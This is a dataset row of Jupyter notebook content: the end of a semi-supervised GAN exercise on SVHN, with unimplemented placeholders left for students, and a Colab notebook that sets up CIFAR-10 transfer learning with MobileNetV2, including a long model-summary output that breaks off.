getattr(dataset, x_name)\n dataset_y = getattr(dataset, y_name)\n for ii in range(0, num_examples, batch_size):\n x = dataset_x[ii:ii+batch_size]\n y = dataset_y[ii:ii+batch_size]\n \n if which_set == \"train\":\n # When we use the data for training, we need to include\n # the label mask, so we can pretend we don't have access\n # to some of the labels, as an exercise of our semi-supervised\n # learning ability\n yield x, y, self.label_mask[ii:ii+batch_size]\n else:\n yield x, y",
"_____no_output_____"
],
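The class above is meant to be constructed from the two dictionaries loaded earlier and then iterated in mini-batches. A small usage sketch — note that the instance has to be named `dataset`, because the `batches` method refers to that global name rather than `self`:

```python
dataset = Dataset(trainset, testset)

# Training batches also yield the label mask used for semi-supervised training
for x, y, label_mask in dataset.batches(128, which_set="train"):
    print(x.shape, y.shape, label_mask.shape)
    break
```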
[
"def model_inputs(real_dim, z_dim):\n inputs_real = tf.placeholder(tf.float32, (None, *real_dim), name='input_real')\n inputs_z = tf.placeholder(tf.float32, (None, z_dim), name='input_z')\n y = tf.placeholder(tf.int32, (None), name='y')\n label_mask = tf.placeholder(tf.int32, (None), name='label_mask')\n \n return inputs_real, inputs_z, y, label_mask",
"_____no_output_____"
],
[
"def generator(z, output_dim, reuse=False, alpha=0.2, training=True, size_mult=128):\n with tf.variable_scope('generator', reuse=reuse):\n # First fully connected layer\n x1 = tf.layers.dense(z, 4 * 4 * size_mult * 4)\n # Reshape it to start the convolutional stack\n x1 = tf.reshape(x1, (-1, 4, 4, size_mult * 4))\n x1 = tf.layers.batch_normalization(x1, training=training)\n x1 = tf.maximum(alpha * x1, x1)\n \n x2 = tf.layers.conv2d_transpose(x1, size_mult * 2, 5, strides=2, padding='same')\n x2 = tf.layers.batch_normalization(x2, training=training)\n x2 = tf.maximum(alpha * x2, x2)\n \n x3 = tf.layers.conv2d_transpose(x2, size_mult, 5, strides=2, padding='same')\n x3 = tf.layers.batch_normalization(x3, training=training)\n x3 = tf.maximum(alpha * x3, x3)\n \n # Output layer\n logits = tf.layers.conv2d_transpose(x3, output_dim, 5, strides=2, padding='same')\n \n out = tf.tanh(logits)\n \n return out",
"_____no_output_____"
],
[
"def discriminator(x, reuse=False, alpha=0.2, drop_rate=0., num_classes=10, size_mult=64):\n with tf.variable_scope('discriminator', reuse=reuse):\n x = tf.layers.dropout(x, rate=drop_rate/2.5)\n \n # Input layer is 32x32x3\n x1 = tf.layers.conv2d(x, size_mult, 3, strides=2, padding='same')\n relu1 = tf.maximum(alpha * x1, x1)\n relu1 = tf.layers.dropout(relu1, rate=drop_rate)\n \n x2 = tf.layers.conv2d(relu1, size_mult, 3, strides=2, padding='same')\n bn2 = tf.layers.batch_normalization(x2, training=True)\n relu2 = tf.maximum(alpha * x2, x2)\n \n \n x3 = tf.layers.conv2d(relu2, size_mult, 3, strides=2, padding='same')\n bn3 = tf.layers.batch_normalization(x3, training=True)\n relu3 = tf.maximum(alpha * bn3, bn3)\n relu3 = tf.layers.dropout(relu3, rate=drop_rate)\n \n x4 = tf.layers.conv2d(relu3, 2 * size_mult, 3, strides=1, padding='same')\n bn4 = tf.layers.batch_normalization(x4, training=True)\n relu4 = tf.maximum(alpha * bn4, bn4)\n \n x5 = tf.layers.conv2d(relu4, 2 * size_mult, 3, strides=1, padding='same')\n bn5 = tf.layers.batch_normalization(x5, training=True)\n relu5 = tf.maximum(alpha * bn5, bn5)\n \n x6 = tf.layers.conv2d(relu5, 2 * size_mult, 3, strides=2, padding='same')\n bn6 = tf.layers.batch_normalization(x6, training=True)\n relu6 = tf.maximum(alpha * bn6, bn6)\n relu6 = tf.layers.dropout(relu6, rate=drop_rate)\n \n x7 = tf.layers.conv2d(relu5, 2 * size_mult, 3, strides=1, padding='valid')\n # Don't use bn on this layer, because bn would set the mean of each feature\n # to the bn mu parameter.\n # This layer is used for the feature matching loss, which only works if\n # the means can be different when the discriminator is run on the data than\n # when the discriminator is run on the generator samples.\n relu7 = tf.maximum(alpha * x7, x7)\n \n # Flatten it by global average pooling\n features = raise NotImplementedError()\n \n # Set class_logits to be the inputs to a softmax distribution over the different classes\n raise NotImplementedError()\n \n \n # Set gan_logits such that P(input is real | input) = sigmoid(gan_logits).\n # Keep in mind that class_logits gives you the probability distribution over all the real\n # classes and the fake class. You need to work out how to transform this multiclass softmax\n # distribution into a binary real-vs-fake decision that can be described with a sigmoid.\n # Numerical stability is very important.\n # You'll probably need to use this numerical stability trick:\n # log sum_i exp a_i = m + log sum_i exp(a_i - m).\n # This is numerically stable when m = max_i a_i.\n # (It helps to think about what goes wrong when...\n # 1. One value of a_i is very large\n # 2. All the values of a_i are very negative\n # This trick and this value of m fix both those cases, but the naive implementation and\n # other values of m encounter various problems)\n \n raise NotImplementedError()\n \n return out, class_logits, gan_logits, features",
"_____no_output_____"
],
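The comment block in the discriminator above asks for `gan_logits` to be derived from `class_logits` using the numerically stable identity `log sum_i exp(a_i) = m + log sum_i exp(a_i - m)` with `m = max_i a_i`. Below is a minimal, self-contained NumPy sketch of just that identity; the logit values are invented to show the overflow/underflow cases the comment warns about, and this is only an illustration, not the notebook's TensorFlow solution:

```python
import numpy as np

def stable_logsumexp(a, axis=-1):
    """log(sum(exp(a))) computed by subtracting the per-row max first."""
    m = np.max(a, axis=axis, keepdims=True)
    return np.squeeze(m, axis=axis) + np.log(np.sum(np.exp(a - m), axis=axis))

# One row of very large logits (naive exp overflows) and one row of very
# negative logits (naive sum underflows to zero, so log gives -inf).
class_logits = np.array([[1000.0,  999.0,  998.0],
                         [-1000.0, -999.0, -998.0]])

print(stable_logsumexp(class_logits))             # finite: ~[1000.41, -997.59]
print(np.log(np.exp(class_logits).sum(axis=-1)))  # naive:  [inf, -inf] plus runtime warnings
```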
[
"def model_loss(input_real, input_z, output_dim, y, num_classes, label_mask, alpha=0.2, drop_rate=0.):\n \"\"\"\n Get the loss for the discriminator and generator\n :param input_real: Images from the real dataset\n :param input_z: Z input\n :param output_dim: The number of channels in the output image\n :param y: Integer class labels\n :param num_classes: The number of classes\n :param alpha: The slope of the left half of leaky ReLU activation\n :param drop_rate: The probability of dropping a hidden unit\n :return: A tuple of (discriminator loss, generator loss)\n \"\"\"\n \n \n # These numbers multiply the size of each layer of the generator and the discriminator,\n # respectively. You can reduce them to run your code faster for debugging purposes.\n g_size_mult = 32\n d_size_mult = 64\n \n # Here we run the generator and the discriminator\n g_model = generator(input_z, output_dim, alpha=alpha, size_mult=g_size_mult)\n d_on_data = discriminator(input_real, alpha=alpha, drop_rate=drop_rate, size_mult=d_size_mult)\n d_model_real, class_logits_on_data, gan_logits_on_data, data_features = d_on_data\n d_on_samples = discriminator(g_model, reuse=True, alpha=alpha, drop_rate=drop_rate, size_mult=d_size_mult)\n d_model_fake, class_logits_on_samples, gan_logits_on_samples, sample_features = d_on_samples\n \n \n # Here we compute `d_loss`, the loss for the discriminator.\n # This should combine two different losses:\n # 1. The loss for the GAN problem, where we minimize the cross-entropy for the binary\n # real-vs-fake classification problem.\n # 2. The loss for the SVHN digit classification problem, where we minimize the cross-entropy\n # for the multi-class softmax. For this one we use the labels. Don't forget to ignore\n # use `label_mask` to ignore the examples that we are pretending are unlabeled for the\n # semi-supervised learning problem.\n raise NotImplementedError()\n \n # Here we set `g_loss` to the \"feature matching\" loss invented by Tim Salimans at OpenAI.\n # This loss consists of minimizing the absolute difference between the expected features\n # on the data and the expected features on the generated samples.\n # This loss works better for semi-supervised learning than the tradition GAN losses.\n raise NotImplementedError()\n\n pred_class = tf.cast(tf.argmax(class_logits_on_data, 1), tf.int32)\n eq = tf.equal(tf.squeeze(y), pred_class)\n correct = tf.reduce_sum(tf.to_float(eq))\n masked_correct = tf.reduce_sum(label_mask * tf.to_float(eq))\n \n return d_loss, g_loss, correct, masked_correct, g_model",
"_____no_output_____"
],
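Two of the placeholders in `model_loss` above are the label-masked classification loss and the feature-matching generator loss described in the comments. The sketch below shows both ideas with plain NumPy on random stand-in arrays; it only illustrates the math, it is not the graded TensorFlow implementation:

```python
import numpy as np
rng = np.random.default_rng(0)

batch, feat_dim, num_classes = 8, 16, 10
data_features   = rng.normal(size=(batch, feat_dim))   # discriminator features on real images
sample_features = rng.normal(size=(batch, feat_dim))   # discriminator features on generated images

# Feature matching: make the mean feature activations on samples track those on data.
g_loss = np.mean(np.abs(data_features.mean(axis=0) - sample_features.mean(axis=0)))

# Label-masked softmax cross-entropy: only the examples we pretend are labeled contribute.
class_logits = rng.normal(size=(batch, num_classes))
y            = rng.integers(0, num_classes, size=batch)
label_mask   = (np.arange(batch) < 4).astype(float)    # pretend only the first 4 examples have labels

shifted        = class_logits - class_logits.max(axis=1, keepdims=True)
log_probs      = shifted - np.log(np.exp(shifted).sum(axis=1, keepdims=True))
per_example_ce = -log_probs[np.arange(batch), y]
class_loss     = (label_mask * per_example_ce).sum() / np.maximum(label_mask.sum(), 1.0)

print(g_loss, class_loss)
```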
[
"def model_opt(d_loss, g_loss, learning_rate, beta1):\n \"\"\"\n Get optimization operations\n :param d_loss: Discriminator loss Tensor\n :param g_loss: Generator loss Tensor\n :param learning_rate: Learning Rate Placeholder\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :return: A tuple of (discriminator training operation, generator training operation)\n \"\"\"\n # Get weights and biases to update. Get them separately for the discriminator and the generator\n raise NotImplementedError()\n\n # Minimize both players' costs simultaneously\n raise NotImplementedError()\n shrink_lr = tf.assign(learning_rate, learning_rate * 0.9)\n \n return d_train_opt, g_train_opt, shrink_lr",
"_____no_output_____"
],
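For `model_opt`, the comments ask for the discriminator and generator variables to be collected separately, each minimized by its own optimizer. Below is a hedged TensorFlow 1.x-style sketch of that pattern; it assumes the `'discriminator'` and `'generator'` variable scopes used earlier, and the `tf.control_dependencies` wrapper is there so batch-norm's moving-average update ops run with the train steps. It is one common way to fill the placeholder, not the official solution:

```python
import tensorflow as tf  # assumes TensorFlow 1.x, as used in the rest of this notebook

def model_opt_sketch(d_loss, g_loss, learning_rate, beta1):
    # Split trainable variables by the scope they were created under.
    t_vars = tf.trainable_variables()
    d_vars = [v for v in t_vars if v.name.startswith('discriminator')]
    g_vars = [v for v in t_vars if v.name.startswith('generator')]

    # Batch norm keeps its moving averages in UPDATE_OPS; run them alongside the train steps.
    with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
        d_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(d_loss, var_list=d_vars)
        g_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(g_loss, var_list=g_vars)

    shrink_lr = tf.assign(learning_rate, learning_rate * 0.9)
    return d_train_opt, g_train_opt, shrink_lr
```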
[
"class GAN:\n \"\"\"\n A GAN model.\n :param real_size: The shape of the real data.\n :param z_size: The number of entries in the z code vector.\n :param learnin_rate: The learning rate to use for Adam.\n :param num_classes: The number of classes to recognize.\n :param alpha: The slope of the left half of the leaky ReLU activation\n :param beta1: The beta1 parameter for Adam.\n \"\"\"\n def __init__(self, real_size, z_size, learning_rate, num_classes=10, alpha=0.2, beta1=0.5):\n tf.reset_default_graph()\n \n self.learning_rate = tf.Variable(learning_rate, trainable=False)\n inputs = model_inputs(real_size, z_size)\n self.input_real, self.input_z, self.y, self.label_mask = inputs\n self.drop_rate = tf.placeholder_with_default(.5, (), \"drop_rate\")\n \n loss_results = model_loss(self.input_real, self.input_z,\n real_size[2], self.y, num_classes,\n label_mask=self.label_mask,\n alpha=0.2,\n drop_rate=self.drop_rate)\n self.d_loss, self.g_loss, self.correct, self.masked_correct, self.samples = loss_results\n \n self.d_opt, self.g_opt, self.shrink_lr = model_opt(self.d_loss, self.g_loss, self.learning_rate, beta1)",
"_____no_output_____"
],
[
"def view_samples(epoch, samples, nrows, ncols, figsize=(5,5)):\n fig, axes = plt.subplots(figsize=figsize, nrows=nrows, ncols=ncols, \n sharey=True, sharex=True)\n for ax, img in zip(axes.flatten(), samples[epoch]):\n ax.axis('off')\n img = ((img - img.min())*255 / (img.max() - img.min())).astype(np.uint8)\n ax.set_adjustable('box-forced')\n im = ax.imshow(img)\n \n plt.subplots_adjust(wspace=0, hspace=0)\n return fig, axes",
"_____no_output_____"
],
[
"def train(net, dataset, epochs, batch_size, figsize=(5,5)):\n \n saver = tf.train.Saver()\n sample_z = np.random.normal(0, 1, size=(50, z_size))\n\n samples, train_accuracies, test_accuracies = [], [], []\n steps = 0\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for e in range(epochs):\n print(\"Epoch\",e)\n \n t1e = time.time()\n num_examples = 0\n num_correct = 0\n for x, y, label_mask in dataset.batches(batch_size):\n assert 'int' in str(y.dtype)\n steps += 1\n num_examples += label_mask.sum()\n\n # Sample random noise for G\n batch_z = np.random.normal(0, 1, size=(batch_size, z_size))\n\n # Run optimizers\n t1 = time.time()\n _, _, correct = sess.run([net.d_opt, net.g_opt, net.masked_correct],\n feed_dict={net.input_real: x, net.input_z: batch_z,\n net.y : y, net.label_mask : label_mask})\n t2 = time.time()\n num_correct += correct\n\n sess.run([net.shrink_lr])\n \n \n train_accuracy = num_correct / float(num_examples)\n \n print(\"\\t\\tClassifier train accuracy: \", train_accuracy)\n \n num_examples = 0\n num_correct = 0\n for x, y in dataset.batches(batch_size, which_set=\"test\"):\n assert 'int' in str(y.dtype)\n num_examples += x.shape[0]\n\n correct, = sess.run([net.correct], feed_dict={net.input_real: x,\n net.y : y,\n net.drop_rate: 0.})\n num_correct += correct\n \n test_accuracy = num_correct / float(num_examples)\n print(\"\\t\\tClassifier test accuracy\", test_accuracy)\n print(\"\\t\\tStep time: \", t2 - t1)\n t2e = time.time()\n print(\"\\t\\tEpoch time: \", t2e - t1e)\n \n \n gen_samples = sess.run(\n net.samples,\n feed_dict={net.input_z: sample_z})\n samples.append(gen_samples)\n _ = view_samples(-1, samples, 5, 10, figsize=figsize)\n plt.show()\n \n \n # Save history of accuracies to view after training\n train_accuracies.append(train_accuracy)\n test_accuracies.append(test_accuracy)\n \n\n saver.save(sess, './checkpoints/generator.ckpt')\n\n with open('samples.pkl', 'wb') as f:\n pkl.dump(samples, f)\n \n return train_accuracies, test_accuracies, samples",
"_____no_output_____"
],
[
"!mkdir checkpoints",
"_____no_output_____"
],
[
"real_size = (32,32,3)\nz_size = 100\nlearning_rate = 0.0003\n\nnet = GAN(real_size, z_size, learning_rate)",
"_____no_output_____"
],
[
"dataset = Dataset(trainset, testset)\n\nbatch_size = 128\nepochs = 25\ntrain_accuracies, test_accuracies, samples = train(net,\n dataset,\n epochs,\n batch_size,\n figsize=(10,5))",
"_____no_output_____"
],
[
"fig, ax = plt.subplots()\nplt.plot(train_accuracies, label='Train', alpha=0.5)\nplt.plot(test_accuracies, label='Test', alpha=0.5)\nplt.title(\"Accuracy\")\nplt.legend()",
"_____no_output_____"
]
],
[
[
"When you run the fully implemented semi-supervised GAN, you should usually find that the test accuracy peaks at 69-71%. It should definitely stay above 68% fairly consistently throughout the last several epochs of training.\n\nThis is a little bit better than a [NIPS 2014 paper](https://arxiv.org/pdf/1406.5298.pdf) that got 64% accuracy on 1000-label SVHN with variational methods. However, we still have lost something by not using all the labels. If you re-run with all the labels included, you should obtain over 80% accuracy using this architecture (and other architectures that take longer to run can do much better).",
"_____no_output_____"
]
],
[
[
"_ = view_samples(-1, samples, 5, 10, figsize=(10,5))",
"_____no_output_____"
],
[
"!mkdir images",
"_____no_output_____"
],
[
"for ii in range(len(samples)):\n fig, ax = view_samples(ii, samples, 5, 10, figsize=(10,5))\n fig.savefig('images/samples_{:03d}.png'.format(ii))\n plt.close()",
"_____no_output_____"
]
],
[
[
"Congratulations! You now know how to train a semi-supervised GAN. This exercise is stripped down to make it run faster and to make it simpler to implement. In the original work by Tim Salimans at OpenAI, a GAN using [more tricks and more runtime](https://arxiv.org/pdf/1606.03498.pdf) reaches over 94% accuracy using only 1,000 labeled examples.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb03904ff559daa6c907933c97fd74a842419685 | 86,730 | ipynb | Jupyter Notebook | colab_file.ipynb | msteknoadam/tf_image_classification | a70189101670c1fb97d81c9bc3457ef8f13f0ed7 | [
"MIT"
] | null | null | null | colab_file.ipynb | msteknoadam/tf_image_classification | a70189101670c1fb97d81c9bc3457ef8f13f0ed7 | [
"MIT"
] | null | null | null | colab_file.ipynb | msteknoadam/tf_image_classification | a70189101670c1fb97d81c9bc3457ef8f13f0ed7 | [
"MIT"
] | null | null | null | 90.721757 | 30,232 | 0.713456 | [
[
[
"try:\n # %tensorflow_version only exists in Colab.\n %tensorflow_version 2.x\nexcept Exception:\n pass\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport tensorflow_datasets as tfds",
"TensorFlow 2.x selected.\n"
],
[
"SPLIT_WEIGHTS = (8, 1, 1)\nsplits = tfds.Split.TRAIN.subsplit(weighted=SPLIT_WEIGHTS)\n\n(raw_train, raw_validation, raw_test), metadata = tfds.load(\n 'cifar10', split=list(splits),\n with_info=True, as_supervised=True)",
"_____no_output_____"
],
[
"class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer',\n 'dog', 'frog', 'horse', 'ship', 'truck']",
"_____no_output_____"
],
[
"IMG_SIZE = 128\n\ndef format_example(image, label):\n image = tf.cast(image, tf.float32)\n # image = (image/127.5) - 1\n image = tf.image.resize(image, (IMG_SIZE, IMG_SIZE))\n return image, label",
"_____no_output_____"
],
[
"train = raw_train.map(format_example)\nvalidation = raw_validation.map(format_example)\ntest = raw_test.map(format_example)",
"_____no_output_____"
],
[
"BATCH_SIZE = 32\nSHUFFLE_BUFFER_SIZE = 1000",
"_____no_output_____"
],
[
"train_batches = train.shuffle(SHUFFLE_BUFFER_SIZE).batch(BATCH_SIZE)\nvalidation_batches = validation.batch(BATCH_SIZE)\ntest_batches = test.batch(BATCH_SIZE)",
"_____no_output_____"
],
[
"for image_batch, label_batch in train_batches.take(1):\n pass\n\nimage_batch.shape",
"_____no_output_____"
],
[
"IMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)\n\nbase_model = tf.keras.applications.MobileNetV2(input_shape=IMG_SHAPE,\n include_top=False,\n weights='imagenet')",
"Downloading data from https://github.com/JonathanCMitchell/mobilenet_v2_keras/releases/download/v1.1/mobilenet_v2_weights_tf_dim_ordering_tf_kernels_1.0_128_no_top.h5\n9412608/9406464 [==============================] - 0s 0us/step\n"
],
[
"feature_batch = base_model(image_batch)\nprint(feature_batch.shape)",
"(32, 4, 4, 1280)\n"
],
[
"base_model.trainable = False",
"_____no_output_____"
],
[
"base_model.summary()",
"Model: \"mobilenetv2_1.00_128\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_1 (InputLayer) [(None, 128, 128, 3) 0 \n__________________________________________________________________________________________________\nConv1_pad (ZeroPadding2D) (None, 129, 129, 3) 0 input_1[0][0] \n__________________________________________________________________________________________________\nConv1 (Conv2D) (None, 64, 64, 32) 864 Conv1_pad[0][0] \n__________________________________________________________________________________________________\nbn_Conv1 (BatchNormalization) (None, 64, 64, 32) 128 Conv1[0][0] \n__________________________________________________________________________________________________\nConv1_relu (ReLU) (None, 64, 64, 32) 0 bn_Conv1[0][0] \n__________________________________________________________________________________________________\nexpanded_conv_depthwise (Depthw (None, 64, 64, 32) 288 Conv1_relu[0][0] \n__________________________________________________________________________________________________\nexpanded_conv_depthwise_BN (Bat (None, 64, 64, 32) 128 expanded_conv_depthwise[0][0] \n__________________________________________________________________________________________________\nexpanded_conv_depthwise_relu (R (None, 64, 64, 32) 0 expanded_conv_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nexpanded_conv_project (Conv2D) (None, 64, 64, 16) 512 expanded_conv_depthwise_relu[0][0\n__________________________________________________________________________________________________\nexpanded_conv_project_BN (Batch (None, 64, 64, 16) 64 expanded_conv_project[0][0] \n__________________________________________________________________________________________________\nblock_1_expand (Conv2D) (None, 64, 64, 96) 1536 expanded_conv_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_1_expand_BN (BatchNormali (None, 64, 64, 96) 384 block_1_expand[0][0] \n__________________________________________________________________________________________________\nblock_1_expand_relu (ReLU) (None, 64, 64, 96) 0 block_1_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_1_pad (ZeroPadding2D) (None, 65, 65, 96) 0 block_1_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_1_depthwise (DepthwiseCon (None, 32, 32, 96) 864 block_1_pad[0][0] \n__________________________________________________________________________________________________\nblock_1_depthwise_BN (BatchNorm (None, 32, 32, 96) 384 block_1_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_1_depthwise_relu (ReLU) (None, 32, 32, 96) 0 block_1_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_1_project (Conv2D) (None, 32, 32, 24) 2304 block_1_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_1_project_BN (BatchNormal (None, 32, 32, 24) 96 block_1_project[0][0] 
\n__________________________________________________________________________________________________\nblock_2_expand (Conv2D) (None, 32, 32, 144) 3456 block_1_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_2_expand_BN (BatchNormali (None, 32, 32, 144) 576 block_2_expand[0][0] \n__________________________________________________________________________________________________\nblock_2_expand_relu (ReLU) (None, 32, 32, 144) 0 block_2_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_2_depthwise (DepthwiseCon (None, 32, 32, 144) 1296 block_2_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_2_depthwise_BN (BatchNorm (None, 32, 32, 144) 576 block_2_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_2_depthwise_relu (ReLU) (None, 32, 32, 144) 0 block_2_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_2_project (Conv2D) (None, 32, 32, 24) 3456 block_2_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_2_project_BN (BatchNormal (None, 32, 32, 24) 96 block_2_project[0][0] \n__________________________________________________________________________________________________\nblock_2_add (Add) (None, 32, 32, 24) 0 block_1_project_BN[0][0] \n block_2_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_3_expand (Conv2D) (None, 32, 32, 144) 3456 block_2_add[0][0] \n__________________________________________________________________________________________________\nblock_3_expand_BN (BatchNormali (None, 32, 32, 144) 576 block_3_expand[0][0] \n__________________________________________________________________________________________________\nblock_3_expand_relu (ReLU) (None, 32, 32, 144) 0 block_3_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_3_pad (ZeroPadding2D) (None, 33, 33, 144) 0 block_3_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_3_depthwise (DepthwiseCon (None, 16, 16, 144) 1296 block_3_pad[0][0] \n__________________________________________________________________________________________________\nblock_3_depthwise_BN (BatchNorm (None, 16, 16, 144) 576 block_3_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_3_depthwise_relu (ReLU) (None, 16, 16, 144) 0 block_3_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_3_project (Conv2D) (None, 16, 16, 32) 4608 block_3_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_3_project_BN (BatchNormal (None, 16, 16, 32) 128 block_3_project[0][0] \n__________________________________________________________________________________________________\nblock_4_expand (Conv2D) (None, 16, 16, 192) 6144 block_3_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_4_expand_BN (BatchNormali (None, 16, 16, 
192) 768 block_4_expand[0][0] \n__________________________________________________________________________________________________\nblock_4_expand_relu (ReLU) (None, 16, 16, 192) 0 block_4_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_4_depthwise (DepthwiseCon (None, 16, 16, 192) 1728 block_4_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_4_depthwise_BN (BatchNorm (None, 16, 16, 192) 768 block_4_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_4_depthwise_relu (ReLU) (None, 16, 16, 192) 0 block_4_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_4_project (Conv2D) (None, 16, 16, 32) 6144 block_4_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_4_project_BN (BatchNormal (None, 16, 16, 32) 128 block_4_project[0][0] \n__________________________________________________________________________________________________\nblock_4_add (Add) (None, 16, 16, 32) 0 block_3_project_BN[0][0] \n block_4_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_5_expand (Conv2D) (None, 16, 16, 192) 6144 block_4_add[0][0] \n__________________________________________________________________________________________________\nblock_5_expand_BN (BatchNormali (None, 16, 16, 192) 768 block_5_expand[0][0] \n__________________________________________________________________________________________________\nblock_5_expand_relu (ReLU) (None, 16, 16, 192) 0 block_5_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_5_depthwise (DepthwiseCon (None, 16, 16, 192) 1728 block_5_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_5_depthwise_BN (BatchNorm (None, 16, 16, 192) 768 block_5_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_5_depthwise_relu (ReLU) (None, 16, 16, 192) 0 block_5_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_5_project (Conv2D) (None, 16, 16, 32) 6144 block_5_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_5_project_BN (BatchNormal (None, 16, 16, 32) 128 block_5_project[0][0] \n__________________________________________________________________________________________________\nblock_5_add (Add) (None, 16, 16, 32) 0 block_4_add[0][0] \n block_5_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_6_expand (Conv2D) (None, 16, 16, 192) 6144 block_5_add[0][0] \n__________________________________________________________________________________________________\nblock_6_expand_BN (BatchNormali (None, 16, 16, 192) 768 block_6_expand[0][0] \n__________________________________________________________________________________________________\nblock_6_expand_relu (ReLU) (None, 16, 16, 192) 0 block_6_expand_BN[0][0] 
\n__________________________________________________________________________________________________\nblock_6_pad (ZeroPadding2D) (None, 17, 17, 192) 0 block_6_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_6_depthwise (DepthwiseCon (None, 8, 8, 192) 1728 block_6_pad[0][0] \n__________________________________________________________________________________________________\nblock_6_depthwise_BN (BatchNorm (None, 8, 8, 192) 768 block_6_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_6_depthwise_relu (ReLU) (None, 8, 8, 192) 0 block_6_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_6_project (Conv2D) (None, 8, 8, 64) 12288 block_6_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_6_project_BN (BatchNormal (None, 8, 8, 64) 256 block_6_project[0][0] \n__________________________________________________________________________________________________\nblock_7_expand (Conv2D) (None, 8, 8, 384) 24576 block_6_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_7_expand_BN (BatchNormali (None, 8, 8, 384) 1536 block_7_expand[0][0] \n__________________________________________________________________________________________________\nblock_7_expand_relu (ReLU) (None, 8, 8, 384) 0 block_7_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_7_depthwise (DepthwiseCon (None, 8, 8, 384) 3456 block_7_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_7_depthwise_BN (BatchNorm (None, 8, 8, 384) 1536 block_7_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_7_depthwise_relu (ReLU) (None, 8, 8, 384) 0 block_7_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_7_project (Conv2D) (None, 8, 8, 64) 24576 block_7_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_7_project_BN (BatchNormal (None, 8, 8, 64) 256 block_7_project[0][0] \n__________________________________________________________________________________________________\nblock_7_add (Add) (None, 8, 8, 64) 0 block_6_project_BN[0][0] \n block_7_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_8_expand (Conv2D) (None, 8, 8, 384) 24576 block_7_add[0][0] \n__________________________________________________________________________________________________\nblock_8_expand_BN (BatchNormali (None, 8, 8, 384) 1536 block_8_expand[0][0] \n__________________________________________________________________________________________________\nblock_8_expand_relu (ReLU) (None, 8, 8, 384) 0 block_8_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_8_depthwise (DepthwiseCon (None, 8, 8, 384) 3456 block_8_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_8_depthwise_BN (BatchNorm (None, 8, 8, 384) 1536 
block_8_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_8_depthwise_relu (ReLU) (None, 8, 8, 384) 0 block_8_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_8_project (Conv2D) (None, 8, 8, 64) 24576 block_8_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_8_project_BN (BatchNormal (None, 8, 8, 64) 256 block_8_project[0][0] \n__________________________________________________________________________________________________\nblock_8_add (Add) (None, 8, 8, 64) 0 block_7_add[0][0] \n block_8_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_9_expand (Conv2D) (None, 8, 8, 384) 24576 block_8_add[0][0] \n__________________________________________________________________________________________________\nblock_9_expand_BN (BatchNormali (None, 8, 8, 384) 1536 block_9_expand[0][0] \n__________________________________________________________________________________________________\nblock_9_expand_relu (ReLU) (None, 8, 8, 384) 0 block_9_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_9_depthwise (DepthwiseCon (None, 8, 8, 384) 3456 block_9_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_9_depthwise_BN (BatchNorm (None, 8, 8, 384) 1536 block_9_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_9_depthwise_relu (ReLU) (None, 8, 8, 384) 0 